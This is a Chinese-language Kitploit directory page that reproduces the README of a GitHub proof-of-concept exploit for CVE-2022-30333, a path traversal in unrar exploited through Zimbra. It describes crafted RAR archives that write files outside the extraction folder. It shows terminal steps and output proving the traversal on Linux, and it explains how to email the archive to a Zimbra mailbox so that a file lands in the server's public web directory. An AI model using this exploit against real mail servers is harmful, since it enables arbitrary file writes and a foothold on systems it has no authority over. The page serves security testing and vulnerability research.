Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2022-30333-PoC — CVE-2022-30333 的概念验证漏洞利用程序,这是 unrar 中被 Zimbra 使用的路径遍历漏洞,演示了通过精心构造的 RAR 压缩包实现任意文件写入。 | Kitploit
工具/GitHubGitHub/thel1ghtvn/cve-2022-30333-poc
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试红队
GitHubthel1ghtvn/cve-2022-30333-poc

CVE-2022-30333-PoC

CVE-2022-30333 的概念验证漏洞利用程序,这是 unrar 中被 Zimbra 使用的路径遍历漏洞,演示了通过精心构造的 RAR 压缩包实现任意文件写入。

查看仓库
1334年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2022-30333-POC

用于测试CVE-2022-30333的示例文件

  • Sample.rar : 如果你想在Linux上测试。解压后,它会在 ../../tmp/traversed 中创建 trav。请确保在解压 Sample.rar 之前目录 ../../tmp/traversed 已存在

  • exp.rar : 如果你想在Zimbra邮件服务器上测试。解压后,它会在 /opt/zimbra/jetty_base/webapps/zimbra/public/ 中创建 moo.txt。你可以通过 https://zimbra\_mail\_domain/public/moo.txt 访问该文件

利用步骤

在Linux上测试

root@kitploit:~
mkdir ../../tmp/traversed (目标文件夹在解压前必须存在)

ls -la ../../tmp/traversed/
total 8
drwxrwxr-x 2 ubuntu ubuntu 4096 Jul  4 02:44 .
drwxrwxr-x 4 ubuntu ubuntu 4096 Jul  4 02:40 ..

unrar x exp.rar

UNRAR 6.10 beta 1 freeware      Copyright (c) 1993-2021 Alexander Roshal

Corrupt header is found
sym - the file header is corrupt

Extracting from exp.rar

Corrupt header is found
sym - the file header is corrupt
Extracting  sym                                                       OK 
Extracting  sym/trav                                                  OK 
Total errors: 4

ls -la ../../tmp/traversed/
total 12
drwxrwxr-x 2 ubuntu ubuntu 4096 Jul  4 02:47 .
drwxrwxr-x 4 ubuntu ubuntu 4096 Jul  4 02:40 ..
-rw-rw-r-- 1 ubuntu ubuntu   14 Jul  4 02:34 trav

cat ../../tmp/traversed/trav
"traversed"

在Zimbra上测试

  • 创建一封邮件并附上恶意rar文件,然后发送到Zimbra邮箱地址。该rar文件将在被Amavisd分析时被解压。
  • moo.txt 应位于:/opt/zimbra/jetty_base/webapps/zimbra/public/moo.txt 或 https://zimbra\_mail\_domain/public/moo.txt

参考资料

  1. DEV2SEC的越南语博客
  2. Sonarsource的英语博客
  3. 特别感谢 mrlihd 帮助我重建Zimbra中的攻击链
下载工具